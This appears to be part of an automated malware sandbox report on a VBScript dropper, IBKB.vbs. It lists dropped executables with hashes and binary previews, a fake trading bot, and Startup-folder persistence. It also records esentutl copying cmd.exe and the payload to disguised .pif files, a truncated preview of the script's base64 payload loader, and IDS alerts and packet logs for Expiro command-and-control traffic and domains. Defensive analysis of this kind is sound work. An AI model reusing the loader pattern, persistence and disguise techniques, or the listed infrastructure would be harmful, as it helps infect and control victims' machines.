                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s0bapu3q.ora.ps1

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\x.exe

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):1226752
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.458699684550258
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:KdKnJlmwhG7vohKM4br2gza6HR2zlPQxL/F99UljJes8lSnQ:KCl70YOLSes8lSQ
                                                                                                                                                                                                                                                                                                                              MD5:53F0663219E6091CECD600C59389711F
                                                                                                                                                                                                                                                                                                                              SHA1:F1986A61C2CB0107444FBD3E8075A25E21FB26CA
                                                                                                                                                                                                                                                                                                                              SHA-256:0161D30DEFEE14B9BDAC49068C63A344320C11330ACDFC10952C025637684ADB
                                                                                                                                                                                                                                                                                                                              SHA-512:9D466680CC90F57ADA29495E32592084EC6DAF37CDC53F2776A720D66F0284B09C619A25C9EDE8E73E91B8C20D2A7AB5DFEE0504BA7454389CE842AFD27962A1
                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................T.............@..........................P...................@...............................%...........................0...g........................... .......................................................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...........z...................idata...%.......&...z..............@....tls....4................................rdata....... ......................@..@.reloc...g...0...h..................@..B.rsrc...............................@..@.............P......................@..@................................................................................................

                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\9aa529efaf59dc6.bin

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):12320
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.98571180913496
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:384:otoqM/TlnhCgs7a2GSwDRZwGwRpGWKtSisdMXrlK:2oTLg7aJPD/w5rGWKQdb
                                                                                                                                                                                                                                                                                                                              MD5:8CE4D0C966626CD29B02600DB610932A
                                                                                                                                                                                                                                                                                                                              SHA1:CB205323FC395C46C07F87CEB6A91B01248A465C
                                                                                                                                                                                                                                                                                                                              SHA-256:E79B750C3A616521F47DD0A7FB9241F124D574E40F39A1773873C370E4E4433E
                                                                                                                                                                                                                                                                                                                              SHA-512:ACC1D65F57B36B403E526F88FCFD2D135C4E482209179C1A60E68F1B2D1663CF2CB094DE76CEDAD03E1D66ACC0E3960473F9CEF03923FF2ECA89C27B9E32601D
                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:#P......Wz....,..M.V..(|b{.e..\.|..n..2..bv0....y......+...Gj........A.3sVx%...f.........B.......'..._..U..A.Z+S.......*...n.g{.aY..c...fm!..~1......c..*3...PP.S....hqJ...C..0......!.#M.D...V[z_..f.e+..."..h.?.l...=\..efS....k<.....q}T>K..f....6.{...........?.^^.D.2C9VL...eG.l...u.....a..<......M6}~..6z.c..).....<........q....Tq..c...#L:8..'.*2"@27.F....dZ....-..G#c ..a!...^"..4Y.ZzU...H<5..q}-..].....qj..6@S&...].@...].V$K.c. ..6.....S'.MQx....6!....8..oC..........$...B..........m......g &..4....?}..}....._w........../L[%...k..;....Zr(a.h.k.....r.m......I4 ...F......./.s..e%...LzS.1.Q......$y.r2.....V<..h.t..K.&.....0...DVL.A>.J...@...bL_..V.wI..y'..C&..#.R`.0...R.5.o].8.@.5.~..@....d(....p.>.?.A.j.)....'F........"....Q.Ia......"..........e.}.V.....T.....K...?.iR...P.......!./.d.....mS-..5........w*}Rj)."A..r....F..........Y....0K..u...$..ae.%I....+..D?Mf......P+..4.u.6V.m....L..cd...[..|\KQ|...G..9d.(........_f....G<..h./

                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\ACCApi\apihost.exe

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):665670656
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9999992846982435
                                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                                                                                              MD5:1EFEA57D13329E8280EA1889052BFB56
                                                                                                                                                                                                                                                                                                                              SHA1:732A4B642995B63E186D401381CC03D309E7FC51
                                                                                                                                                                                                                                                                                                                              SHA-256:82DB2E4BB807C5FAD567D473C3C28BB27072846161DF0276A1927CDB6EE90D4E
                                                                                                                                                                                                                                                                                                                              SHA-512:291E3301220F33359CD119B0D615ADDC96861EC8BAA000A0261A144F3FC80FB2EC76292E29CB7678FB332091893BEE12A1C39408B4A27206EFAD0180C31A4C81
                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Wed Nov 20 08:24:43 2024, mtime=Wed Nov 20 08:24:43 2024, atime=Wed Nov 20 08:24:43 2024, length=70656, window=
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):1778
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.4721021971326214
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:24:8d5mvfIo8ZZ3W4ZBN4WeQAAMoFG9KmR+O4ZvPqRepRm:8d5cymIs5A1cR+ZXqR8
                                                                                                                                                                                                                                                                                                                              MD5:3C095F27D5FBB56476C7464D04E04746
                                                                                                                                                                                                                                                                                                                              SHA1:7719DD95F35C482C2DA720BF1F727F13D77C27AE
                                                                                                                                                                                                                                                                                                                              SHA-256:4AE9DB9C182BFC48009E3C163B8BF883B610D0AA0027F8739E9E5C3589266B2C
                                                                                                                                                                                                                                                                                                                              SHA-512:DDB091D1F8196E8B92807FC54DDD2A5AC4223C2D85E7D01F9B762C7D41A63D4FE268134BB0AA129C7C27D78A8F9C15524D7AAE2B2EF21C84787B2C3703D6BF50
                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:L..................F.@.. ...eb...;..x....;..x....;............................:..DG..Yr?.D..U..k0.&...&...... M........-;...8...;......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSltY.K....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....tY.K..Roaming.@......DWSltY.K....C.....................S...R.o.a.m.i.n.g.....T.1.....tY.K..ACCApi..>......tY.KtY.K....).....................(J4.A.C.C.A.p.i.....b.2.....tY.K .apihost.exe.H......tY.KtY.K....*......................s'.a.p.i.h.o.s.t...e.x.e.......a...............-.......`............).......C:\Users\user\AppData\Roaming\ACCApi\apihost.exe....A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.4.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%USERPROFILE%\AppData\Local\Temp\Trading_AIBot.exe.........................................................................................................................

                                                                                                                                                                                                                                                                                                                              \Device\ConDrv

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):593
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.638187678646862
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:12:qx/xTzmBzeSbZ7u0wxDDDDDDDDjCaY5Da3laYAV/TB8NGNe:+/xTzkzp7u0wQakDa1aT/t8NR
                                                                                                                                                                                                                                                                                                                              MD5:3BB4FC6DF3D437752B0DAC76E39AF076
                                                                                                                                                                                                                                                                                                                              SHA1:B0CF2C9A11297C3E8FCB3D7689FBD79F6B8A9EF4
                                                                                                                                                                                                                                                                                                                              SHA-256:10308A3ED7C65D984B74793E1418E5E566459640FFAC3598495BAE254E5599DE
                                                                                                                                                                                                                                                                                                                              SHA-512:78599BBDF51376702908F3A730AF5E7E9BA439AB3CD8D60BA62D62F659413EF8E4A99AB6C1C2508CF984BE053C58DFC1CFD81FFDE0A9099718D66C4FAB903427
                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\AppData\Local\Temp\x.exe...Destination File: C:\\Users\\Public\\Libraries\\Juqmtmya.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x12b800 (1226752) (1 MB)....Total bytes written = 0x12c000 (1228800) (1 MB).......Operation completed successfully in 0.109 seconds.....

                                                                                                                                                                                                                                                                                                                              \Device\Null

                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                              Size (bytes):564
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.559213258257705
                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                              SSDEEP:12:q6pLExT6ceSbZ7u0wxDDDDDDDDjCaY5n4aYAWS4TB8NGNBG:/pLExT6cp7u0wQakn4al4t8Nd
                                                                                                                                                                                                                                                                                                                              MD5:0EC1978C7DEABF43A4FC760EC68F2A60
                                                                                                                                                                                                                                                                                                                              SHA1:887D9B6EE210AFAF91496A6F2F2C99B255B8DDE2
                                                                                                                                                                                                                                                                                                                              SHA-256:031E9AA615CABA557C9DAC4EB8280AD0535CE9817B9C65BFFBADB77DCEBAD51B
                                                                                                                                                                                                                                                                                                                              SHA-512:31A919374C8E4A6C1C126C7C9630D49EA2CC5715627746857CADFD79918DE9865036B44A758DA83C1F703299804108B828246780B595296A8C132FB1A6EB7557
                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                              Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\cmd.exe...Destination File: C:\\Users\\Public\\alpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x39c00 (236544) (0 MB)....Total bytes written = 0x3a000 (237568) (0 MB).......Operation completed successfully in 0.62 seconds.....

                                                                                                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                                                              File type:ASCII text, with very long lines (65413), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.875877429476062
                                                                                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                                                                                                File name:IBKB.vbs
                                                                                                                                                                                                                                                                                                                                File size:1'636'027 bytes
                                                                                                                                                                                                                                                                                                                                MD5:7bbca6f64625872be1a4dba80d36fce1
                                                                                                                                                                                                                                                                                                                                SHA1:a689a21b1b8a556b7e77be10f2e7ddc0dff7d360
                                                                                                                                                                                                                                                                                                                                SHA256:d61aad06edbdd7500c507a9df016cfbdc6a21731bd707c51d97abebf687c76b6
                                                                                                                                                                                                                                                                                                                                SHA512:faf0cbcfa48c56ac77cd4f7b7e7dcc1c2c42908eb430493d36444e1c0de6b8f77326a051f34d34370e7f0134a079424e7e5e86d6a1451b03f5a598a77433f5d1
                                                                                                                                                                                                                                                                                                                                SSDEEP:24576:EIvgQAdJSSNSo4oRUTvt13g+qA+aj1tHKUJS2t9HqG7ZaSJyhh4B:vgQUNSo4oebUHYRdzSCrYc
                                                                                                                                                                                                                                                                                                                                TLSH:A7759EB85366AF613BDA47C40D48AEC54E240147903E521D6D29B1330B4AABEFB9DC7F
                                                                                                                                                                                                                                                                                                                                File Content Preview:Option Explicit..dim D,E,b,p..Set D=CreateObject("Microsoft.XMLDOM")..Set E=D.createElement("t")..E.DataType="bin.base64"..E.Text="TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0g

                                                                                                                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                                                                                                                Icon Hash:68d69b8f86ab9a86

                                                                                                                                                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:24:34.113260+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705198.252.105.91443TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:24:48.189753+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.54970754.244.188.17780TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:24:48.209894+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.549707TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:24:48.209894+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.549707TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:24:50.252791+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.549708TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:24:50.252791+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.549708TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:24:53.747785+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.5512981.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:24:54.647482+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.549731TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:24:54.647482+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.549731TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:24:57.177822+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.5524991.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:25:15.402425+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.5507471.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:25:17.134094+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.5635401.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:25:26.514301+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.5511561.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:25:27.879440+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.5609281.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:02.433224+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.55000582.112.184.19780TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:26.064766+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.550011TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:26.064766+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.550011TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:32.924764+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.246.200.16080192.168.2.550017TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:32.924764+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.246.200.16080192.168.2.550017TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:33.604162+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.550018TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:33.604162+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.550018TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:36.015830+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.550020TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:36.015830+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.550020TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:38.794559+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz135.164.78.20080192.168.2.550023TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:38.794559+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst135.164.78.20080192.168.2.550023TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:43.938547+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.211.97.4580192.168.2.550029TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:26:43.938547+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.211.97.4580192.168.2.550029TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:27:00.479581+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.550043TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:27:00.479581+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.550043TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:27:01.876394+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.246.231.12080192.168.2.550044TCP
                                                                                                                                                                                                                                                                                                                                2024-11-20T10:27:01.876394+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.246.231.12080192.168.2.550044TCP

                                                                                                                                                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:33.540559053 CET49704443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:33.540601015 CET44349704198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:33.540684938 CET49704443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:33.540925026 CET49704443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:33.540960073 CET44349704198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:33.541404963 CET49704443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:33.574376106 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:33.574414968 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:33.574634075 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:33.576492071 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:33.576504946 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.113181114 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.113260031 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.117325068 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.117336035 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.117669106 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.167431116 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.210839987 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.251364946 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.343523026 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.390475988 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.430572987 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.430589914 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.430629969 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.430645943 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.430656910 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.430744886 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.430758953 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.430772066 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.430865049 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.435946941 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.435959101 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.436001062 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.436120987 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.436120987 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.436135054 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.436175108 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.467866898 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.467888117 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.468095064 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.468122959 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.468206882 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.520097971 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.520121098 CET44349705198.252.105.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.520275116 CET49705443192.168.2.5198.252.105.91
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:34.520304918 CET44349705198.252.105.91192.168.2.5
